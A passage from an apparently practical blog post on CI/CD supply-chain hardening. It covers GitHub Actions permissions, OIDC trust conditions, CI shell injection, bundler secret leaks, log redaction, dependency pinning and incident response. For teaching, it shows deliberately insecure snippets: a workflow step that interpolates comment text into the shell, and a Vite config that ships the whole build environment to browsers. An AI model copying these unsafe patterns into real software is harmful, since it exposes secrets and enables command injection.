&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with &lt;code&gt;permissions: write-all&lt;/code&gt; receives a &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; with write scopes across that repository's API surface (contents, issues, pull requests, packages, deployments) for the duration of that workflow run.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; default-deny at workflow level, grant per-job:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;       &lt;span class="c1"&gt;# for checkout&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;      &lt;span class="c1"&gt;# for AWS OIDC&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;zizmor&lt;/code&gt; (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running &lt;code&gt;permissions: write-all&lt;/code&gt;. Today none of them do.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reusable workflows (&lt;code&gt;workflow_call&lt;/code&gt;)&lt;/strong&gt; inherit the caller's &lt;code&gt;permissions:&lt;/code&gt; unless explicitly overridden. &lt;code&gt;secrets: inherit&lt;/code&gt; on the caller hands every repository secret to the callee. Pass secrets explicitly by name and re-declare &lt;code&gt;permissions:&lt;/code&gt; in every reusable workflow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;pull_request_target&lt;/code&gt; is the single highest-severity GitHub Actions footgun.&lt;/strong&gt; Unlike &lt;code&gt;pull_request&lt;/code&gt;, it runs in the context of the base repository with the base repo's &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; and access to repository secrets. If you &lt;code&gt;actions/checkout&lt;/code&gt; the PR head, you've executed an attacker's code with privileged credentials. Default rule: never check out PR head code in a &lt;code&gt;pull_request_target&lt;/code&gt; workflow; never run third-party scripts inside one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Replace long-lived AWS keys with GitHub OIDC.&lt;/strong&gt; The role's trust policy restricts assumption to your repository's workflows; CI never holds a credential that survives the run. The footgun: a &lt;code&gt;sub&lt;/code&gt; condition like &lt;code&gt;repo:org/*:*&lt;/code&gt; hands AWS-role assumption to any workflow run from any branch, including a fork's PR. Anchor &lt;code&gt;sub&lt;/code&gt; to a specific repo + ref:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringLike"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"repo:yourorg/yourrepo:ref:refs/heads/main"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note that anchoring to &lt;code&gt;refs/heads/main&lt;/code&gt; still lets &lt;em&gt;any&lt;/em&gt; push to &lt;code&gt;main&lt;/code&gt; assume the role: fine for a build-and-test role, too permissive for a production-deploy role. For deploy roles, anchor to a tag pattern (&lt;code&gt;ref:refs/tags/v*&lt;/code&gt;) or to a GitHub Environment with required reviewers. For higher precision than &lt;code&gt;sub&lt;/code&gt;, use &lt;code&gt;job_workflow_ref&lt;/code&gt;. It constrains to a specific leaf workflow file and is resilient to a malicious reusable-workflow caller inside the same repo. AWS, GCP Workload Identity Federation, and Azure federated credentials all expose it.&lt;/p&gt;

&lt;p&gt;CI translations: GitLab CI uses &lt;code&gt;id_tokens:&lt;/code&gt; per-job and CI/CD job-token scope allowlists; Buildkite uses agent-queue ACLs and Vault Agent for secret distribution; CircleCI uses restricted contexts; Jenkins uses &lt;code&gt;withCredentials&lt;/code&gt; per-step plus folder-level credential isolation. Different YAML, same default-deny pattern.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 9: Untrusted input → Shell (CWE-78 in CI)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; GitHub-context fields like &lt;code&gt;github.event.comment.body&lt;/code&gt;, &lt;code&gt;pull_request.title&lt;/code&gt;, &lt;code&gt;head_ref&lt;/code&gt; are attacker-controlled. When interpolated directly into a &lt;code&gt;run:&lt;/code&gt; block, they become shell injection. The same class exists everywhere: GitLab &lt;code&gt;$CI_*&lt;/code&gt; from triggered events, Jenkins parameterised builds, Buildkite &lt;code&gt;meta-data&lt;/code&gt;, Azure &lt;code&gt;variables&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Unsafe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;BODY&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}&lt;/span&gt;
&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;$BODY"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the boundary the lede sat on. The fix was a four-line diff. The control that catches the next one (&lt;code&gt;actionlint&lt;/code&gt; for syntax + &lt;code&gt;zizmor&lt;/code&gt; for security patterns, both as required PR checks) was one commit. Cross-CI: &lt;code&gt;semgrep --config=p/ci&lt;/code&gt; covers most major vendors with one ruleset.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 3. Runtime-side: what ships and what leaks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; a &lt;code&gt;define&lt;/code&gt; block in your bundler (Vite, Webpack, esbuild, Rollup) that spreads &lt;code&gt;process.env&lt;/code&gt; into the client bundle. Frontend bundlers replace &lt;code&gt;process.env.X&lt;/code&gt; with the value at build time, so whatever was in the build host's env becomes a string literal in the JS shipped to every browser.&lt;/p&gt;

&lt;p&gt;We had this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// vite.config.ts&lt;/span&gt;
&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// TODO: fix this later&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env.PUBLIC_API_URL&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;PUBLIC_API_URL&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;// explicit allowlist; nothing implicit&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same principle for &lt;code&gt;NEXT_PUBLIC_*&lt;/code&gt;, &lt;code&gt;VITE_*&lt;/code&gt;, &lt;code&gt;REACT_APP_*&lt;/code&gt;, &lt;code&gt;EXPO_PUBLIC_*&lt;/code&gt; env vars: assume browser-readable, never put secrets behind these prefixes. Same failure mode in mobile too: Android &lt;code&gt;BuildConfig.API_KEY = "$apiKey"&lt;/code&gt; from a checked-in &lt;code&gt;gradle.properties&lt;/code&gt;; iOS API keys in &lt;code&gt;Info.plist&lt;/code&gt; or &lt;code&gt;xcconfig&lt;/code&gt;. Assume any string in the artefact is extractable.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; logging frameworks default to verbose. CloudWatch, Datadog, Sentry retain log lines for weeks. A &lt;code&gt;console.log(req)&lt;/code&gt; in a request handler dumps the &lt;code&gt;Authorization&lt;/code&gt; header to a 30-day-retention log, accessible to any engineer with read access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; redaction at the framework level (not per call-site):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="nx"&gt;pino&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;pino&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;logger&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;pino&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;redact&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.cookie&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;config.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// catches Axios errors&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.password&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.token&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.secret&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="na"&gt;censor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;[REDACTED]&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The one that bit us: AxiosError objects carry the original request configuration, including &lt;code&gt;Authorization&lt;/code&gt; headers. &lt;code&gt;logger.error(msg, axiosErr)&lt;/code&gt; without redaction quietly dumps every bearer token your service has ever forwarded.&lt;/p&gt;

&lt;p&gt;Every mature logger has the primitive: &lt;code&gt;structlog&lt;/code&gt; processors (Python), &lt;code&gt;logback&lt;/code&gt;'s &lt;code&gt;MaskingPatternLayout&lt;/code&gt; (Java), &lt;code&gt;zap&lt;/code&gt; / &lt;code&gt;zerolog&lt;/code&gt; field hooks (Go), &lt;code&gt;tracing&lt;/code&gt; field filters (Rust), &lt;code&gt;Rails.config.filter_parameters&lt;/code&gt; (Ruby), &lt;code&gt;Serilog.Enrichers.Sensitive&lt;/code&gt; (.NET). Last line of defence regardless of stack: an &lt;strong&gt;OpenTelemetry Collector&lt;/strong&gt; with an &lt;code&gt;attributes/delete&lt;/code&gt; processor that scrubs in transit before logs reach Datadog or CloudWatch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The limit.&lt;/strong&gt; &lt;code&gt;pino&lt;/code&gt; redact is a denylist; it only scrubs the paths you list. Custom auth headers (&lt;code&gt;x-api-key&lt;/code&gt;, &lt;code&gt;x-vault-token&lt;/code&gt;), GraphQL &lt;code&gt;variables.password&lt;/code&gt;, &lt;code&gt;request.body.token&lt;/code&gt;, provider-specific shapes are all easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; vulnerable transitive dependency, no maintainer response, can't wait.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; force-pin the transitive with documented rationale and an expiry date:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"overrides"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"lodash-es"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"4.17.23"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"tar"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"7.5.11"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every package manager has the primitive: npm &lt;code&gt;overrides&lt;/code&gt;, yarn &lt;code&gt;resolutions&lt;/code&gt;, pip &lt;code&gt;constraints.txt&lt;/code&gt;, Poetry direct-promotion, uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;, Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;, Gradle &lt;code&gt;resolutionStrategy.force&lt;/code&gt;, Cargo &lt;code&gt;[patch.crates-io]&lt;/code&gt;, Go &lt;code&gt;replace&lt;/code&gt;, Bundler direct gem pin, NuGet central package management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Override-rot is real:&lt;/strong&gt; outdated overrides shadow newer transitive versions that already have the fix. Each override should reference its CVE, the introducing PR, and a re-evaluation date. The &lt;code&gt;audit-allowlist.json&lt;/code&gt; schema we use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"ghsa"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"GHSA-xxxx-yyyy-zzzz"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"package"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"the affected package"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"severity"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"high | critical"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"rationale"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"why this risk is accepted (must explain reachability or absence of fix)"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"verified_by"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"engineer email or handle"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"added"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"expires"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;max&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;90&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;days&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"follow_up"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"what removes this entry"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;CI fails when &lt;code&gt;expires&lt;/code&gt; passes; the gate forces a re-decision rather than letting drift accumulate.&lt;/p&gt;




&lt;h2&gt;
  
  
  When prevention fails: the response side
&lt;/h2&gt;

&lt;p&gt;Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Forensic record.&lt;/strong&gt; Retain CI build logs for at least 90 days, forwarded to an immutable sink (S3 with object lock, or a logging platform with retention). Without this, "did the malicious axios version run for us during the window?" is unanswerable. GitHub-hosted runners are ephemeral; once a job finishes, the host is gone. Pre-configure log shipping and an artifact upload of suspicious-run state.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Provenance lookup.&lt;/strong&gt; &lt;code&gt;rekor-cli search --artifact &amp;lt;digest&amp;gt;&lt;/code&gt; answers "did our pipeline sign this digest?" &lt;code&gt;gh attestation verify&lt;/code&gt; answers it for GitHub-attested artifacts. &lt;strong&gt;OSV-Scanner&lt;/strong&gt; retroactively queries your lockfile against advisory windows ("did we have axios 1.14.x in a build between March 30 12:00 UTC and 15:00 UTC?"). &lt;strong&gt;GUAC&lt;/strong&gt; (Graph for Understanding Artifact Composition) builds a queryable provenance graph across artifacts. &lt;strong&gt;Trivy&lt;/strong&gt; + &lt;strong&gt;Grype&lt;/strong&gt; drive SBOM-based scanning post-incident; &lt;strong&gt;Dependency-Track&lt;/strong&gt; is the consumption side. An SBOM you don't continuously diff against vulnerability feeds is a compliance artefact, not a control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OIDC token revocation playbook.&lt;/strong&gt; Know how to invalidate cached OIDC subject claims. Know which AWS role trust policies to tighten. Know how to query Sigstore Rekor for "did we sign this digest during the suspect window?" All process documentation, not tooling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Secret rotation in dependency order.&lt;/strong&gt; If CI is suspect, rotation order matters. Start at the leaves (npm publish tokens, third-party SaaS keys), then deploy roles, then DB credentials. Rotating root credentials first invalidates the OIDC tokens you'd need to rotate the leaves. Document who calls whom; security incidents are a bad time to discover ambiguity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image quarantine.&lt;/strong&gt; ECR lifecycle policy plus an admission-controller tag-block on the suspected window's digests. Until your &lt;code&gt;cosign verify&lt;/code&gt; says the digest you're running is the digest you signed, treat anything from that window as suspect.&lt;/p&gt;

&lt;p&gt;Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.&lt;/p&gt;




&lt;h2&gt;
  
  
  What one week of focused work actually moved
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Third-party Action SHA pinning&lt;/td&gt;
&lt;td&gt;0% of 110 &lt;code&gt;uses:&lt;/code&gt; lines&lt;/td&gt;
&lt;td&gt;100% with &lt;code&gt;pinact&lt;/code&gt; CI gate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow &lt;code&gt;permissions: write-all&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;8 of 16 workflows&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lockfile integrity coverage&lt;/td&gt;
&lt;td&gt;99.97% (1 off-registry tarball, no &lt;code&gt;integrity:&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;99.97% + CI allowlist enforcement with rationale per off-registry entry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;12 hours&lt;/td&gt;
&lt;td&gt;3 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production Dockerfile USER directive&lt;/td&gt;
&lt;td&gt;0 of 7 (all root)&lt;/td&gt;
&lt;td&gt;7 of 7 (non-root)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production base image digest pinning&lt;/td&gt;
&lt;td&gt;0 of 7&lt;/td&gt;
&lt;td&gt;7 of 7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image signing&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;cosign keyless on every ECR push, workflow-path-anchored verify identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time secret scanning&lt;/td&gt;
&lt;td&gt;pre-commit only (skippable)&lt;/td&gt;
&lt;td&gt;pre-commit + CI (unskippable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time SAST&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CodeQL &lt;code&gt;security-extended&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow security audit&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependency CVE gate&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pnpm audit --prod --audit-level high&lt;/code&gt; with documented allowlist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SBOM generation&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CycloneDX + SPDX on every push to main&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 7.&lt;/strong&gt; Audit of &lt;code&gt;.github/workflows/&lt;/code&gt;. Every external &lt;code&gt;uses:&lt;/code&gt; was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. &lt;code&gt;pinact run --check --verify&lt;/code&gt; added as required status check.&lt;/li&gt;
&lt;li&gt;
